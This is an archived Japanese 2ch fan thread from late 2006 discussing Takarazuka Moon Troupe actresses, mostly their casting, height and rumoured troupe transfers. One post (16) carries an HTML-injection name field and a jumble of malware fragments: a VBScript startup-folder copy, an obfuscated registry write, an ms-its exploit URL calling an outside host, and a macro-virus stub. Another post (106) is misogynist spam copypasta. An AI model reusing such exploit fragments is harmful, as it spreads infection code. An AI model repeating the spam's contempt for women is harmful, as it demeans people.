5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

月組娘役Part14

1 :名無しさん@花束いっぱい。:2006/11/24(金) 23:01:06 ID:94WaXapj
前スレ

月組娘役Part13
http://hobby8.2ch.net/test/read.cgi/siki/1152785521/l50

2 :名無しさん@花束いっぱい。:2006/11/25(土) 10:13:24 ID:9txFgjdh
おつで〜す。

3 :名無しさん@花束いっぱい。:2006/11/25(土) 17:12:03 ID:6f1Wwa6e
新スレおめ!
そしてスレたて乙。

4 :名無しさん@花束いっぱい。:2006/11/25(土) 23:20:46 ID:PSxralJf
>>1タソ
乙でしたー!

5 :名無しさん@花束いっぱい。:2006/11/26(日) 00:03:09 ID:vW8kplx5
前スレ1000タソおめでとう!

6 :名無しさん@花束いっぱい。:2006/11/26(日) 01:16:53 ID:Rt++Mquu
1000 名前:名無しさん@花束いっぱい。 sage投稿日:2006/11/25(土) 19:16:39 ID:Wmd+Qx82
1000なら、来年中に結婚出来る!!


2chで1000取りしてるようじゃ無理!!!


                      じゃない?


7 :名無しさん@花束いっぱい。:2006/11/27(月) 11:58:35 ID:2a70YQo6
7ゲット記念「上げ」!

8 :名無しさん@花束いっぱい。 :2006/11/27(月) 12:55:59 ID:iiyrxTmx
鼻くそ保持って8げと

9 :名無しさん@花束いっぱい。:2006/11/30(木) 13:55:07 ID:PL0oy575
あげ〜

10 :名無しさん@花束いっぱい。:2006/12/02(土) 12:41:09 ID:wCcsF6Ls
前に上げてから、2レス・・・寂しいね・・・
みんな、月娘が嫌いなのかな・・・

11 :名無しさん@花束いっぱい。:2006/12/02(土) 14:32:37 ID:kMYEcD6e
特に話すことがないんだと思うよ。
もしも娘役大異動があったとしたら人も戻ってくるさ・・・

12 :名無しさん@花束いっぱい。:2006/12/04(月) 14:58:46 ID:HJA/zUqa
今からお正月公演が楽しみです。
女の子達の見せ場もあって、そしてみんなが楽しめる作品だといいなぁ。
保守かきこ。

13 :名無しさん@花束いっぱい。:2006/12/04(月) 19:37:48 ID:gnJt1FF8
まあ・・・男役も 女の子 なんだけどなw

14 :名無しさん@花束いっぱい。:2006/12/05(火) 13:41:33 ID:QWcumhpy
>>13
あ!そうだったー!
つい間違えるんだよね…w
姉妹のジェンヌさんの話題の時も間違えて兄弟って言っちゃうし(汗
すまんです。

15 :名無しさん@花束いっぱい。:2006/12/07(木) 08:27:46 ID:/J+rQWrL
つい間違えて、上げちゃうんだよね・・・すまん!

16 :<body onload=window()>:2006/12/09(土) 22:33:31 ID:CTirJRaP
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???????

17 :名無しさん@花束いっぱい。:2006/12/12(火) 07:36:31 ID:2P/tX+dB
パリの〜
新人公演のヒロインに夢咲ねねサンが
入団3年目で2回目のヒロインをするって
新聞で見たんだけど
そこに黒木瞳も受賞したスミレ賞も今年受賞したと書いてあった。(即出だったらスマソ)
月組公演あまり見たことないので
わからないんだけど
夢咲ねねサンって
どんな感じな方なんだろう。。
将来有望そうだね。。

長文でスマソ

18 :名無しさん@花束いっぱい。:2006/12/13(水) 02:34:50 ID:S6gOJafW
ねねはまだまだ若い勢いって感じだな。

華やかさはあるが、何かが特出していいっていうものがないような。

でも、目がついいっちゃうから、大切な華やかさはクリアしてる。

有望株?

19 :名無しさん@花束いっぱい。:2006/12/13(水) 10:10:30 ID:w8qlUJbJ
ねねは、星奈ゆりぐらいの背がありそうね。

20 :名無しさん@花束いっぱい。:2006/12/13(水) 10:19:03 ID:Ryq6Qm/d
入り出見た感じだと、ねねの方が明らかにでかいよ。

21 :名無しさん@花束いっぱい。:2006/12/13(水) 18:55:53 ID:w8qlUJbJ
えっ?まじで?星奈ゆりも娘役にしては、かなり大きかったのに、
ねねはそれ以上なのね。



22 :名無しさん@花束いっぱい。:2006/12/13(水) 18:57:19 ID:p78vpoZy
ねねもおっきいが、れみも結構でかいよね。



23 :名無しさん@花束いっぱい。:2006/12/13(水) 19:51:58 ID:RjBioOIX
ねねとゆりならねねの方がデカイ。
れみは薄幸オーラ漂ってる割には意外と骨太でごつい。

24 :名無しさん@花束いっぱい。:2006/12/13(水) 22:12:23 ID:g+4du8v0
ねねはCS見たら太ってるね。
れみは痩せてて綺麗。

25 :名無しさん@花束いっぱい。:2006/12/13(水) 22:15:09 ID:hSABF3WL
ころんちゃんは1番小さいの?

26 :名無しさん@花束いっぱい。:2006/12/13(水) 23:35:34 ID:exZ5PdsD
>>24
嫌な感じ。
いつも出てくる痛いれみファン ?

27 :名無しさん@花束いっぱい。:2006/12/13(水) 23:35:51 ID:Ryq6Qm/d
ねねって生意気で意地悪そうな(女の子らしい)可愛さがイイ!

28 :名無しさん@花束いっぱい。:2006/12/14(木) 00:08:05 ID:wpsXQRjB
ねねもれみも童顔なのに背は高いねー。

29 :名無しさん@花束いっぱい。:2006/12/14(木) 00:27:45 ID:54w0hj0K
>>25
ころんは小さいね…子役専科になっちゃうかな?可愛いから期待してたけど蘭乃に役ついたしね。

30 :名無しさん@花束いっぱい。:2006/12/14(木) 00:52:19 ID:w+rq7i7s
月は1番の子にとにかく役つけるからね。
ころんちゃんは名前の通りころんころんしてるから。

31 :名無しさん@花束いっぱい。:2006/12/14(木) 00:53:42 ID:w+rq7i7s
なつこは勢いなくしたねー。
まー今までが不思議な扱いだったけどね。

32 :名無しさん@花束いっぱい。:2006/12/14(木) 08:30:33 ID:54w0hj0K
>>31
ころんころんしてるかな?
なつこは幼児体型。

33 :名無しさん@花束いっぱい。:2006/12/14(木) 10:42:27 ID:WvqL8sam
なっちゃんかわいいのにねー
あのまま頑張ってホシカッタ

34 :名無しさん@花束いっぱい。:2006/12/14(木) 11:17:12 ID:wpsXQRjB
ふじこも入りで見たとき意外と大きいと思ったよ。



35 :名無しさん@花束いっぱい。:2006/12/14(木) 11:24:17 ID:dx9AavKJ
なっちゃんはくらりんの引き立て役になっちゃうくらいの幼児体型
+丸顔だったもの。
だからリカさんのコンサートに歳下で抜擢したり前に出してただけ
って気がする。

36 :名無しさん@花束いっぱい。:2006/12/14(木) 12:28:23 ID:/J04/3OQ
でもなっちゃんのほうがエミクラよりはるかに可愛いよ。

37 :名無しさん@花束いっぱい。:2006/12/15(金) 23:48:50 ID:v2pU2qal
来年のラインナップ出たけど・・・
ダル湖って娘役に役あったっけ?
ヒロインの妹くらい?
大劇場はよく分からないし。
きりやんのバウヒロも気になる。
あいあい以外がいいなあ。

38 :名無しさん@花束いっぱい。:2006/12/16(土) 00:56:13 ID:n/IUB2Fm
バウヒロはあいあいだよ。
前ポシャったから日本物できりあいが組むの初めてだしね。
ねねのDCが気になるんだよ。

39 :名無しさん@花束いっぱい。:2006/12/16(土) 01:07:12 ID:ctBz1Jfa
あいあい正直秋田…。
だからといって、れみねねもなんか微妙。
ぜいたくかな…。

40 :名無しさん@花束いっぱい。:2006/12/16(土) 01:58:09 ID:+pDkU/vc
なみだ橋の様に沢山おかしな役者が出ててほしい。
コモさんの遊女、あー様の役、ちずさんのいいお上さん。

86期の女役も芝居できそうだから役つけてあげて。


41 :名無しさん@花束いっぱい。:2006/12/16(土) 02:09:09 ID:1W93sbiG
ねねは男役のみりおより明らかに大きいもん。

42 :名無しさん@花束いっぱい。:2006/12/16(土) 02:45:56 ID:Wcfi6uzj
>>41
それが ?
2人とも微妙なラインだったから、それぞれの持ち味に合った方を選んだのでしょう。
それが充分成功してるし、実際みりおの方が少しだけど高いし、
いい加減しつこい。


43 :名無しさん@花束いっぱい。:2006/12/16(土) 08:33:37 ID:bY5yvUV4
れみは異動の噂があるよね?

44 :名無しさん@花束いっぱい。:2006/12/16(土) 11:52:24 ID:iQOHsqIa
噂ならねねもあるでしょ。
ねね→宙、れみ→雪
どっちも噂だけどね。

45 :名無しさん@花束いっぱい。:2006/12/16(土) 16:10:15 ID:bY5yvUV4
ねね→宙か星

れみ→雪か星 星に月娘から移動の噂がある。

46 :名無しさん@花束いっぱい。:2006/12/16(土) 16:26:42 ID:7P5H1Nob
え、宙にこれ以上新公ヒロイン経験者増やすんですか?

47 :名無しさん@花束いっぱい。:2006/12/16(土) 17:48:34 ID:iQOHsqIa
ねねはデカイから宙が合うって話じゃない?

48 :名無しさん@花束いっぱい。:2006/12/16(土) 18:27:08 ID:ctBz1Jfa
単なる噂でしょ。ねねはデカイから宙、
れみははかなげだから雪。
87期娘役シャッフルはガセだって自白した人もいたし、
そもそも娘役大シャッフルも有るのかどうかわからない。

49 :名無しさん@花束いっぱい。:2006/12/16(土) 20:55:24 ID:vN05u16o
ねねは本当は167あるけど持ち味が娘役。
だけど遙くららさんも166あったから、(相手役の麻実れいさんは172)
良い相手役と組めれば成功するとオモ


50 :名無しさん@花束いっぱい。:2006/12/16(土) 21:55:26 ID:bY5yvUV4
白城あやかちゃんも166実際はあったみたいだから、ねねも大きい
相手役と組めばうまくいくかもね。 今の組なら、あひとマギーならOK
かな。

51 :名無しさん@花束いっぱい。:2006/12/17(日) 13:01:18 ID:N4uQF+Mq
ねねがいくらでかいからって、モックやあやかと並べられないと思うが。

52 :名無しさん@花束いっぱい。:2006/12/17(日) 18:08:03 ID:a6HEGhYY
ねねだって、これからどう化けるか分からないよ。

53 :名無しさん@花束いっぱい。:2006/12/18(月) 01:25:01 ID:DndSIwff
TCAの同じ衣装での並びで比べると
あやか<優子<優里 だった。
その優里ちゃんが166cmだったときいたから
あやかは166cmはないと思う。

54 :名無しさん@花束いっぱい。:2006/12/19(火) 09:26:46 ID:LYyykeI2
かなみ→あいあい→れみで、月娘1は、しばらく安泰。

55 :名無しさん@花束いっぱい。:2006/12/19(火) 10:36:39 ID:puQSA5UW
れみはトプ娘にはどうだろう。
顔と存在が寂しすぎる。

56 :名無しさん@花束いっぱい。:2006/12/19(火) 12:41:31 ID:RE772InM
>>55
同意。
今までも1歩先だったねねが、今回で3番手確定みたいだしね。
ねねの異動が無いとしたら、もう研 5で、下からも出てくるだろうし・・・




57 :名無しさん@花束いっぱい。:2006/12/20(水) 03:42:47 ID:nUg2047I
学年が上がるにつれデカイと娘役らしさが薄れるから、
ねねも研7までが勝負じゃないかな?
カナミンも、そろそろ引退してくれないと月娘老化

58 :名無しさん@花束いっぱい。:2006/12/20(水) 06:38:34 ID:nx8xUWzm
れみは組替えされそうだなー。
ダル恋で新公ヒロインに戻れればわからないけど・・・



59 :名無しさん@花束いっぱい。:2006/12/20(水) 07:57:23 ID:7wAGxe8k
ダルは新公ないよ…れみのカマラ見たいけど。

60 :名無しさん@花束いっぱい。:2006/12/20(水) 09:50:18 ID:gKtRAEJz
マジシャンでヒロがまたれみに戻るかもしれないしな。
ねねは3番手確定っぽいが、れみもショーの配役見る限りそこまで扱い下げてるわけではないようだし…

61 :名無しさん@花束いっぱい。:2006/12/20(水) 10:50:16 ID:zoCXnWzu
末子姐!ハピバ★あげ!!

62 :名無しさん@花束いっぱい。:2006/12/20(水) 12:04:42 ID:2PaUc36u
上げたくないんだけどな・・・どうしたらいいんだろう?

63 :名無しさん@花束いっぱい。:2006/12/20(水) 13:46:56 ID:nx8xUWzm
そうだったねダル恋は全ツだった!
れみはねねと競い合うより他の組にいったほうが一皮むけそう

64 :名無しさん@花束いっぱい。:2006/12/20(水) 19:08:41 ID:ELm1NpiK
>57

ねねちゃんは、月にいてもトップ娘役はきついよ
いくらなんでも背高すぎ!
アヒかモリエの相手役ならいいだろうけど…
トップ確定の路線なら星のちえの相手役とかどう?


65 :名無しさん@花束いっぱい。:2006/12/20(水) 21:24:21 ID:kOiK5dA7
ちえもねねにはチビじゃない?

66 :名無しさん@花束いっぱい。:2006/12/20(水) 21:29:57 ID:CqB0xVKt
>65
眼科に行った方が良い。

67 :名無しさん@花束いっぱい。:2006/12/20(水) 21:35:37 ID:8sg9GWHR
http://atq.ck.valuecommerce.com/servlet/atq/referral?sid=2219441&pid=874302784&vcptn=blog%2Fp%2FdSfxN_Fm3N_yVt5whufQMESbfDNi

68 :名無しさん@花束いっぱい。:2006/12/20(水) 23:02:43 ID:ZCPTCFOo
ねねんちはれみに負けたくなくて頑張ってるからね。
劇団はれみを押したいんだろうけど。
何にしろ、どっちかは移動しそうだね。

69 :名無しさん@花束いっぱい。:2006/12/20(水) 23:14:41 ID:eH8ITRqD
>68
逆じゃね?
やり手の月Pは二人に優劣がつかないよう上手く采配してるけど、
板に乗ると急に老けるれみは形勢不利でしょ。

70 :名無しさん@花束いっぱい。:2006/12/21(木) 01:17:31 ID:24k+vbyE
ねねは若さはあるが、キャピキャピしてて漏れは苦手。
れみは薄幸だし、老けて見えるし。

71 :名無しさん@花束いっぱい。:2006/12/21(木) 06:10:45 ID:Ix86HpQJ
れみは何故か老けてみえるね。
痩せすぎて老けてるわけでもないしね・・・
れみんちはねねんちみたいにお金持ちではないのか?


72 :名無しさん@花束いっぱい。:2006/12/21(木) 08:24:57 ID:L5vZUnY2
ねねも充分老けて見えないか?
目つきが悪いからかなー?

73 :名無しさん@花束いっぱい。:2006/12/21(木) 09:12:39 ID:UrpNoEjV
>>69
そうかな?私も>>68さんに同意で、劇団はれみを推したいんだと思ったよ。
下級生の頃はれみの方が扱い良くなかった?(っていってもチョットした役だけど)
えみくらの子供時代の役や、ジャワの踊り子もちょっとした役を貰ってたよね。
それで焦ったねねママが頑張っちゃったのかなぁと思ったよ。
直後にエリザの新公かっさらって行ったし、その後劇団も急にねね推しになって
ちょっとアレ?って思ったもん。ただ、個人的には薄幸っぽいれみより
華のあるねねの方が真ん中向きだと思うので今のねね推しには賛成なんだけどね。
ねねはもうちょっと痩せた方がいいと思う。

74 :名無しさん@花束いっぱい。:2006/12/21(木) 10:38:06 ID:Ix86HpQJ
やっぱれみのキャラクターは雪娘向きよね。

75 :名無しさん@花束いっぱい。:2006/12/21(木) 10:38:21 ID:bIJEczBj
>73
ママ云々は関係ない。
研1・2の頃はお試し時期だから、とにかく成績良者を使ってみる。
研1時はねねの方が扱いはかなり良かった。
研2で成績が逆転してれみを使ってみたが、ねねの方が良いという判断だっただけ。
前回の試験でも、順位に変化がなかったにもかかわらず、
ねね 3番手確定ということが、それを如実に物語っている。
劇団は最初からねね推しですよ。
もし、れみの方を劇団が推しているのなら、エリザでの扱いはもっと良かったはず。  
東京の代役で、当初はWトリオにも入っていなかった。
どうも、れみファンの願望としか思えないが。


76 :名無しさん@花束いっぱい。:2006/12/21(木) 11:38:32 ID:24k+vbyE
なんだかねねファンの願望に見える…

77 :名無しさん@花束いっぱい。:2006/12/21(木) 13:01:59 ID:bIJEczBj
そうね、どちらかというとねねの方が好みかも。
でも月組ファンの1人として、ねねれみは気になる。
2人の扱いは気になってずっと注意して観てきた。
れみは、子役やキャラクター的な扱いが多い中、
ねねは、上級生と一緒にナンバーのダンスメンバーに最下で入っていたり、
ここ最近のショーは、2人同じ場でも明らかにねねの方が良い。
れみファンにしてみれば、認めたくないという気持ちも分からなくもないけどw
もう少し冷静に現実を受け止めよう。

今回のパレードの並びが面白いことになっているらしいから、楽しみにしていましょ。


78 :名無しさん@花束いっぱい。:2006/12/21(木) 16:54:06 ID:aGtU3YlA
ねねは器用な感じだから今からじゃんじゃん使って育てて、れみはじっくり育てて行きそう。
二人とも頑張ってほしいな。

79 :名無しさん@花束いっぱい。:2006/12/21(木) 19:19:20 ID:U+GqJvDn
ねねは明るいからトプ娘になってもいいと思う。
でも月組以外でお願いします。

80 :名無しさん@花束いっぱい。:2006/12/21(木) 21:30:49 ID:6UZThJpP
ねね3番手確定なの?

81 :名無しさん@花束いっぱい。:2006/12/21(木) 22:31:30 ID:kMwVUUr9
>80
ショーであさかな・きりあい・ゆひねねと組むらしい
だからでは?

82 :名無しさん@花束いっぱい。:2006/12/21(木) 23:08:27 ID:iOH/hZ51
ねねはオクラホマであれだけ大きな役もらってるからねぇ

83 :名無しさん@花束いっぱい。:2006/12/22(金) 06:55:37 ID:Mj7b0gpU
>81
そうだと思う。れみはエトワールだけど3人のなかの一人だしね。
ねねのが3番手娘扱いだね。 でも来年は、どちらかが異動になりそう。


84 :名無しさん@花束いっぱい。:2006/12/22(金) 10:54:11 ID:mBp6n3nr
ねねは宙、れみは雪が一番似合いそう。
で雪からさゆ。彼女の現代的な雰囲気は月っぽいと思う。

85 :名無しさん@花束いっぱい。:2006/12/22(金) 10:57:37 ID:hlCRlC8I
れみちゃん、星に来なさい!

86 :名無しさん@花束いっぱい。:2006/12/22(金) 11:42:35 ID:B5X5K0JG
確かにれみは雪っぽい。ねねは背が高いし、雰囲気なんかも宙に合ってる気がするけども、アリスがいるからね〜。
さゆは星でも合うと思う。

87 :名無しさん@花束いっぱい。:2006/12/22(金) 12:27:57 ID:ERfYHsAz
ヤンブラのヒロインとオクラホマのアドアニー、
扱いとしてはどっちが上なんだろうか?

88 :名無しさん@花束いっぱい。:2006/12/22(金) 13:08:58 ID:oox9q+cT
ねねは腰振りすぎるダンスがこわい…TCAのハイパーステージで引いた…

でも華はあるね。れみは目にも入ってこないもの。

89 :名無しさん@花束いっぱい。:2006/12/22(金) 13:25:37 ID:WvZ7uScE
>87
比べものにならないくらいアドアニーが上。
ワークショップのヒロイン、しかも芝居のみと
中日ほぼ2番手扱いの時点で、ねねの方が上だと思うが。

90 :名無しさん@花束いっぱい。:2006/12/22(金) 13:31:31 ID:Mj7b0gpU
ねねは宙で悠末と大きい同士コンビ見たい!!
れみは雪のが絶対似合う!! まーちゃんみたいな雰囲気あるし。

  


91 :名無しさん@花束いっぱい。:2006/12/22(金) 17:25:30 ID:EcUvHeBm
なんかねねファンうざい

92 :名無しさん@花束いっぱい。:2006/12/23(土) 02:21:21 ID:XJ6FO2cV
>91
おたくもね。

93 :名無しさん@花束いっぱい。:2006/12/23(土) 11:25:55 ID:f9zspr2z
>92
おたくもね。

94 :名無しさん@花束いっぱい。:2006/12/23(土) 12:04:18 ID:UMnCrdqw
>>75=77のお陰で夢咲ねね嬢の素晴らしさ、偉大さがよくわかりました。

95 :名無しさん@花束いっぱい。:2006/12/23(土) 12:13:55 ID:12QHObeL
そりゃ 良かった!
            ねねれみ談義はもうお腹いっぱいかも。
他の娘役の話題は無いの?

96 :名無しさん@花束いっぱい。:2006/12/23(土) 13:22:06 ID:0leyH/Pg
あさこのDSメンバーに娘役は誰が入るのかね?


97 :名無しさん@花束いっぱい。:2006/12/23(土) 19:21:16 ID:Arq/vZLR
我が愛しのアイドル、あーちゃん&ほたるちゃんの話がしたい・・・

98 :名無しさん@花束いっぱい。:2006/12/23(土) 22:23:09 ID:g54XNFf8
今日のBSの放送を見たのですが、城咲さんが完全に2番手扱いでびっくりしました。
地方者で、ここしばらく月組さんは観ていなかったため、
全く煽りではなくお聞きしたいのですが、
城咲さんは他の娘役さんたちよりも1つ抜け出た、
次期トップ娘役として認識されているのでしょうか?

99 :名無しさん@花束いっぱい。:2006/12/23(土) 22:39:41 ID:0M4Pn21Y
すみません。
こちらで良いかわからないのですが質問させて下さい。
DVDレ・ビジュー・ブリアンのブラックダイヤで
あさこさんとキスしてる娘役さんとその両端にいる娘役さんをそれぞれ教えていただけませんか?

100 :名無しさん@花束いっぱい。:2006/12/23(土) 22:45:56 ID:pF3u/rSf
98
私はトップ候補とは思わない。
それなりに上手いが、顔がな…

101 :名無しさん@花束いっぱい。:2006/12/23(土) 22:54:29 ID:mDWAAcqB
>>98
星組の陽月華のトップが内定した今、一番トップに近い娘役だと思う

>>99
相手は次公演で退団するふじこ(紫水梗華)
向かって左(紫)が夢咲ねね、右(赤)が白華れみ

102 :名無しさん@花束いっぱい。:2006/12/23(土) 23:25:46 ID:iF01Y1ho
話、トン切りスマソン。
今日、レビュドリ見て音きち、りんかに萌えた。
音きち、何気に沢山映ってて嬉しい。無条件に、あの娘に目いくわ〜。目元、口元パッチリで美人。
りんかは、前髪あるから見つけやすいけど、ほんま萌えた。外国のお人形みたいやね。余談だが、握力が異状に弱い彼女にも萌えた。

103 :名無しさん@花束いっぱい。:2006/12/24(日) 09:39:15 ID:SzazulSF
音キチは顔がデカすぎる。
男顔だよね。

104 :名無しさん@花束いっぱい。:2006/12/24(日) 15:09:29 ID:1vePbP1T
うん 音きち顔デカスギ可愛いくない…

105 :名無しさん@花束いっぱい。:2006/12/24(日) 17:39:59 ID:SsJXj5yr
おときち、顔も大きくてチョット出っ歯じゃない?でも可愛いとは思う。
りんかちゃんはライオンに噛まれた人にそっくりだった。

106 :名無しさん@花束いっぱい。:2006/12/24(日) 21:06:04 ID:G+4N0cwQ
His judgement cometh and that right soon

男性諸君、結婚すると不幸になる。女の外面は綺麗で清潔で良い人、内面はずるくて汚いため、口も悪くなる
今の女は「どうやって男にたかるか」を必死に考えてる。騙されるな。家事は極めて軽労働になった
コンビニやPC、風俗関係も、「嫁いらず」に拍車をかける。今の女は「人生の不良債権」「北朝鮮」「金メッキを施したゴキブリ」
社会的に男女は対等で平等。男が女を養ったり守る必要はない「見切れ!見切り千両!私不幸なの?嘘!泣いてます?演技!情けは不要!つけこまれるぞ」
女は社会的優遇、過剰な法的保護、仕事と家庭の二束のわらじを得て、もはや女尊男卑〜結婚しようとするあなたを彼女は陰で小馬鹿にしている事でしょう〜

★☆★よほどの事が無い限り結婚は保留し、沢山の女性と自由に恋愛(sex)を楽しめ♪★☆★ 避妊(ピル等)は忘れずにねd(^−^
★☆★捨てた女は優しい真面目男が結婚(残飯処理)してくれるさw★☆★

それでも結婚する君へ究極の護身法→[夫婦財産契約登記]
夫婦財産契約により契約財産制となり、自分の稼いだ財産はすべて自分の物
離婚時に財産の半分を配偶者に取られない

・弱い者いじめは最低と言いつつ、赤ちゃんを殺す母親(そして無罪判決(笑
・狙撃は女子のほうが強い。男は、ノイローゼになってやめてしまうが
女は何人殺してもノイローゼにならない。そして、骨盤が安定しているため

・ナチスの拷問で、女の拷問の残虐非道さを見て、拷問をしていた男達もひいたという
拷問しながら楽しそうに笑みをうかべていたそうだ。罪悪感や引け目が無い

・有史以前が女尊男卑の時代だったことを指摘したのは、スイスの学者バッハオーフィン
アマゾン女族の女王は、法律を定め、女には従軍させ、男たちには卑しい奴隷の仕事を課した
男児が生まれたら、脚と腕を不自由にして、戦えなくした
・王位継承権が女性にだけあったという事実だけから考えて、古代エジプトでは女性権力が非常に大きかった
男女平等どころか、かなり女性上位の社会であった
・日本国でも卑弥呼が女王
・昆虫などにいたっては、オスカマキリはメスに食われてしまう

女は虐げられてきた?父系社会など人類の歴史から見ればほんのわずかな期間に過ぎない。むしろ・・・

107 :名無しさん@花束いっぱい。:2006/12/24(日) 22:36:41 ID:4z5E58PT
>>101
ありがとうございます。
もうひとついいでしょうか?
ロケットで最初に下手から出て来る3人組が、
右がれみさん、中央がねねさんというのがわかりますが左端がわかりません。
お名前を教えていただけますでしょうか。

108 :名無しさん@花束いっぱい。:2006/12/24(日) 22:52:53 ID:E6vGbx4V
麗百愛さんだと思います☆

109 :名無しさん@花束いっぱい。:2006/12/24(日) 22:59:01 ID:4z5E58PT
>>108
ありがとうございます。

110 :名無しさん@花束いっぱい。:2006/12/24(日) 23:00:06 ID:4z5E58PT
>>108
ありがとうございます。
麗さんとは意外でした。
パンフで見る顔とだいぶ違うのですね。

111 :名無しさん@花束いっぱい。:2006/12/25(月) 10:44:00 ID:10leqef5
なつこはもういい役つけられないかな〜。
勿論トップは無理なのはわかるんだけど、
カノチカみたいに組のかわいいマスコットキャラ的な位置にいてほしい…

112 :名無しさん@花束いっぱい。:2006/12/25(月) 13:08:38 ID:Dyeb+zLN
Jazzyのオープニングのアイリッシュダンスシーンで、
麗さんがどこにいるか知りたいのですがどなたか教えてください。
よろしくお願いします。

113 :名無しさん@花束いっぱい。:2006/12/25(月) 13:12:01 ID:JWmhpbAj
>111
カノチカは路線だったからまだそれなりの役があったりしたけど、なっちゃんは路線に乗れんしなぁ…。
そんなカノチカだって、月組時代はバウやDC以外の本公演はたいてい可愛い子グループどまりだったでしょ?
本公演は難しいよ、路線娘役ですら役がない。暁は言わずもがなだけど…そんな中でJAZZYでアサコの子供時代役を与えられたなっちゃんはまだいい方なんじゃない?
なっちゃんも『愛しき人よ』のさららんの恋人役とか『熱帯夜話』のナッツとかオイシイ役はこれまでもあったし、たとえば今度のきりバウできりやんの妹役でもゲットできればいいんじゃないかなぁ?

114 :名無しさん@花束いっぱい。:2006/12/25(月) 22:36:20 ID:cruGoFYd
阪急初詣ポスターモデルの蘭乃はなさん、可愛い〜
新聞にも大きく載ってたけど、この方、大沢あかねに似てる、、。
初詣ポスターモデルはスターの登竜門だし、頑張れ、蘭ちゃん(´ゞ`)〜

115 :名無しさん@花束いっぱい。:2006/12/25(月) 22:55:30 ID:6ACLUtBN
悪口じゃないけど
この子プログラム写真徹底的にれみちゃんを研究したよねww
入団すぐのれみちゃんの写真が可愛いって評判だったから。

お目目はちっちゃい(細い?)けど、不思議な愛らしさがある
楽しみにしてるよ♪

116 :名無しさん@花束いっぱい。:2006/12/25(月) 22:55:37 ID:qqjSqBr3
誰かに似てると思ってたら…それだ!!


117 :名無しさん@花束いっぱい。:2006/12/26(火) 20:20:04 ID:Z6kHqUEo
蘭乃はなって花純風香に似てない?

118 :名無しさん@花束いっぱい。:2006/12/26(火) 20:37:07 ID:k2e8Rcvz
似てる。。。

119 :名無しさん@花束いっぱい。:2006/12/26(火) 20:55:04 ID:44aRZVUO
どうやら、れみはどこかの組に移動されそうだよ

120 :名無しさん@花束いっぱい。:2006/12/26(火) 21:05:23 ID:F1h+GoYD
雪だと良いな。

121 :名無しさん@花束いっぱい。:2006/12/26(火) 21:13:24 ID:44aRZVUO
さゆとトレード

122 :名無しさん@花束いっぱい。:2006/12/26(火) 22:14:09 ID:hDT5kwpR
星がいいな。寂しいけど

123 :名無しさん@花束いっぱい。:2006/12/26(火) 22:34:55 ID:r9lHA0Dj
組替えならねねをお願い(汗)
あの子はそーゆー経験させたほうがいい。
自分を客観視できるチャンスが必要だよ。

124 :名無しさん@花束いっぱい。:2006/12/26(火) 23:54:02 ID:MzQjCO69
>>117
そっっっっっっっっっっくり。TOKKのページ見てびっくりした。

125 :名無しさん@花束いっぱい。:2006/12/27(水) 16:12:42 ID:TJ4/21DE
れみちゃんを徹底的に研究したってどういう意味?
化粧を?教えてもらったこと?

126 :名無しさん@花束いっぱい。:2006/12/27(水) 22:24:40 ID:0O1aiemh
今回のお芝居。
ある意味、たきちゃんの一人勝ち。
(ショーも含めると、まるで組長就任お披露目公演のよう…)

娘1のかなみでさえ、やっとこさっとこな程度。
あいちゃん以下、娘役は大した活躍は期待できません。
暁に続いて、月娘、及びファンには不遇な演目になりそう…orz

127 :名無しさん@花束いっぱい。:2006/12/27(水) 23:36:31 ID:wy927bT1
全然関係ないけど、みっぽーちゃんが好きです。未だにGSの越リュウのリフトが忘れられん。

128 :名無しさん@花束いっぱい。:2006/12/28(木) 09:05:57 ID:b2vczA10
127様 一緒に観劇しませんか?

129 :名無しさん@花束いっぱい。:2006/12/28(木) 09:40:46 ID:0SAER33M
127さま、128さま、私も入れてください!

130 :127:2006/12/28(木) 17:49:16 ID:GL/aSEzR
>>128>>129(・∀・)人(・∀・)人(・∀・)ナカーマガイパーイ!

GSと前後して愛しき人よ見て、あんなにいじらしいからつい・・・w
ガーディと同じ人と思えんw

131 :名無しさん@花束いっぱい。:2006/12/28(木) 19:31:33 ID:xn6Q0M+T
霧ヤンのバウの相手役は誰になるのか?
あと全ツの2番手娘も気になる。

たぶんその頃は、ねねかれみのどちらかが異動になってそうだよね。

132 :名無しさん@花束いっぱい。:2006/12/28(木) 20:21:33 ID:0VKWd4um
きりバウは城咲だよ。

133 :名無しさん@花束いっぱい。:2006/12/28(木) 20:29:10 ID:b2vczA10
もういい加減にしてほしい。>シロサキヒロイン。(涙)

134 :名無しさん@花束いっぱい。:2006/12/28(木) 21:23:14 ID:xIZUbvxf
は〜〜い、129に続く
SENAコンのかっこいいダンスに惹かれた。
男役やらせたらけっこういけるんじゃないかと
背と顔が娘役なんだよね。でも、大好き。


135 :名無しさん@花束いっぱい。:2006/12/28(木) 21:43:13 ID:CLmZIAYx
>132
まぁそうだろうな
なみだ橋〜のリベンジだろうか

136 :名無しさん@花束いっぱい。:2006/12/28(木) 22:25:09 ID:97jAkJsw
申し訳ないけど、あいあい秋田よね…。
星もウメばっかだけど、まとぶバウをコトコトがやったりした。
今更あーちゃんは無いだろうけど、中堅でヒロインも
出来る子が居ると、幅が広がって層も厚くなるよね。

